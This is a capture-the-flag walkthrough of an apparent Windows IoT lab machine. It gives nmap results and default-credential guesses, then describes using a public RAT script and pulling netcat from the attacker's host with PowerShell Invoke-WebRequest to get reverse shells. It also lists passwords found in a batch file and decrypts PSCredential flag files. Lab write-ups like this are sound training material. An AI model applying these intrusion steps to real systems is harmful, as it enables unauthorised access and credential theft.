5.9 KiB
Host is up (0.21s latency).
Not shown: 65529 filtered ports
135/tcp open msrpc Microsoft Windows RPC
5985/tcp open upnp Microsoft IIS httpd
8080/tcp open upnp Microsoft IIS httpd
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=Windows Device Portal
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Site doesn't have a title.
29817/tcp open unknown
29819/tcp open arcserve ARCserve Discovery
29820/tcp open unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: Host: PING; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 355.84 seconds
PORT 8080
The site was asking me for credentials , I tried to goolge deafult password for Windows Device Portal
User Name :Administrator password :p@ssw0rd
But these credentials didn't work that I found on google
Then I came to know that this is an IoT box also I found a repository on GitHub which is a script that acts as RAT (Remote Access Trojan)
I tried running commands that were on the repository so basically you want to install hexdump
module on python2 because these works with python2
So our RAT is working perfectly!
Now let's try to craft a backdoor to get a reverse shell and start metasploit listener
But this didn't worked
Let's try to upload a netcat
binary by hosting on our local machine and using powershell Invoke-WebRequest -Uri $ip -OutFile $filepath
So it did it get transfered on the target box
Looks like this version of netcat
is not compatible , I then again tried to upload netcat64.exe
and we got a hit
So let's keep our fingers crossed and hope we get a reverse shell
And we got it :D
Here we can see there are 3 drives and we are in C
drive where as in D
drive we can see the app
and administrator
folder but we are not able to access them and D
drive is formatted correctly so we cannot access it
By using dir /a
we can see the hidden folder although we could have used powershell and used ls -la
but this still gets our job done so when reading the contents of r.bat
we can two users as we suspected and what net user
is doing is that changing the password of both the users also it is also deleting that account in a loop
net user app mesh5143
net user administrator _1nt3rn37ofTh1nGz
So I think we could not switch users as we do in linux atleast I don't know how to do it I tried googling in pasting the commands but didn't work so I assumed that this would be the password for that Windows Device Portal
that we saw in the beginning .
So once I got into the application I looked around that what can I do with it and found where I can run system commands
Now to see that which user are we , I tried ruuning whoami
it failed but when I ran echo %username%
it showed me that I'm Administrator so let's find a way to get a shell from here
Now we already uploaded nc64.exe
in C:\Windows\Temp
Now we can't really read the contents of user.txt
and root.txt
because they are stored as an credential object in powershell which is called PSCredential Object
Now inorder to decrypt user.txt
we need to be logged in as ther user in which that file user.txt
in and for root.txt
we need to be an administrator so we are admintrator let's try to decrypt that flag for now and then we will switch to app
First we create an object in which that file is stored
$file = Import-Clixml -Path U:\Users\administrator\root.txt
Then if it gives no errors this command ran sucessfully
Then this would use this an object to call a function to grab the password
Now for app
user I'm going to quickly log in as him through Windows Device Portal
run the netcat binary and caputre the reverse shell
Inorder to do that since there was no logout
option on that portal I had to clear all browser's data then logged in with the password that we found for app
I tried ruuning the nc64.exe
binary but it was giving accessed denied so there was Public
directory in C
drive I uploaded the binary there
And we have a shell as app
And we got the user flag as well
This link was really helpful for me to decrypt the password or in this case flag https://www.travisgan.com/2015/06/powershell-password-encryption.html